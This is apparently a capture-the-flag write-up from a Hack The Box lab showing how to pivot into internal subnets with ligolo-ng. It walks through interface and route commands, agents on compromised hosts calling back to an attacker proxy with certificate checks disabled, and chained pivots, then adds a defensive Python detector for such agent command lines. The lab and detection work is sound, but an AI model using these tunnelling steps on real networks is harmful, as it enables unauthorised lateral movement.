Port Forwarding using Ligolo-ng

I did this in HTB Dante. I will write this post as generically as possible.

Assume you already have access to a machine, e.g. 10.10.110.X. You noticed that it has access to the 172.16.1.0/24 network.

You want to access 172.16.1.0/24 from your local Kali machine, 10.10.14.2.

End result should look something like this:

Download the agent and proxy files from the ligolo-ng GitHub repository.

Transfer the agent file to the target machine, 10.10.110.X.

Set up the interface and route in Kali by running these commands:

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo

Now it is time to establish the connection.

Kali:
sudo ./proxy -selfcert

Target:
chmod +x agent
./agent -connect 10.10.14.2:11601 -ignore-cert

The proxy shows that the agent has joined, so start the session in Kali:

session
1
start

On a new terminal window, you should be able to ping machines that are in 172.16.1.0/24.

Double Pivoting

Assumptions: Your Kali machine is able to reach the 172.16.1.0/24 network using ligolo-ng from the previous step. Now you want it to reach 172.16.2.0/24 as well. The machine that has connectivity to 172.16.2.0/24 is 172.16.1.A.

End result should look like this image:

On Kali, add another route:

sudo ip route add 172.16.2.0/24 dev ligolo

Transfer the agent file to 172.16.1.A. It will be agent.exe if it is a Windows machine.

Run the same command as before:

agent.exe -connect 10.10.14.2:11601 -ignore-cert

On your original ligolo-ng proxy screen, you can see that a new agent has joined. Switch to this new agent:

session
2
start
Yes

Now ping should work for IPs in either subnet.

However, you will only be able to reach one machine, e.g. 172.16.2.B, because you are pivoting from 172.16.1.A. If you want to reach other machines in 172.16.2.0/24, you have to pivot from 172.16.2.B.

Transfer the agent file to 172.16.2.B, which you currently have access to, and run the same command again:

./agent.exe -connect 10.10.14.2:11601 -ignore-cert

On the proxy window, switch sessions by running the same commands:

session
3
start
Yes

Now, you are able to access machines in both subnets.
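
Seen from the defender's side, every agent launched in this post carries the same command-line shape, and all three hosts call back to one proxy endpoint. The following Python is an added example, not part of the original post or the ligolo-ng project: it flags that shape in process-creation records and groups hosts by callback endpoint. The sample events, the renamed binary path and the function names are constructed assumptions, and Go-style flag syntax (-flag value or -flag=value) is assumed.

```python
import re
from collections import defaultdict

DEFAULT_PORT = 11601  # port used in the post's -connect examples
ENDPOINT = re.compile(r"^([\w.\-]+):(\d{1,5})$")

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("10.10.110.X", "./agent -connect 10.10.14.2:11601 -ignore-cert"),
    ("172.16.1.A", "agent.exe -connect 10.10.14.2:11601 -ignore-cert"),
    ("172.16.2.B", r"C:\Users\Public\updater.exe -ignore-cert -connect=10.10.14.2:11601"),
    ("172.16.1.C", "ssh -o ConnectTimeout=5 admin@172.16.1.1"),
    ("172.16.1.D", "/opt/backup/agent --connect-timeout 30 backup.example.internal"),
]

def classify(cmdline):
    """Return a finding for an agent-style command line, else None.
    Keys on the flag pattern, not the binary name, so renamed binaries still match."""
    args = cmdline.split()
    endpoint, ignore_cert = None, False
    for i, arg in enumerate(args[1:], start=1):
        name, _, value = arg.partition("=")
        if re.fullmatch(r"--?connect", name):
            value = value or (args[i + 1] if i + 1 < len(args) else "")
            match = ENDPOINT.match(value)
            if match:
                endpoint = (match.group(1), int(match.group(2)))
        elif re.fullmatch(r"--?ignore-cert", name) and value.lower() != "false":
            ignore_cert = True  # certificate validation disabled
    if endpoint is None:
        return None
    signals = int(ignore_cert) + int(endpoint[1] == DEFAULT_PORT)
    return {"endpoint": f"{endpoint[0]}:{endpoint[1]}", "ignore_cert": ignore_cert,
            "severity": ("low", "medium", "high")[signals]}

def scan(events):
    """Classify every (host, cmdline) record and keep the hits."""
    return [{"host": h, **hit} for h, c in events if (hit := classify(c))]

def fan_in(findings):
    """Group hosts by callback endpoint; several hosts on one endpoint suggests a pivot chain."""
    groups = defaultdict(list)
    for f in findings:
        groups[f["endpoint"]].append(f["host"])
    return dict(groups)

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    print(*hits, fan_in(hits), sep="\n")
```
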

Cheers!


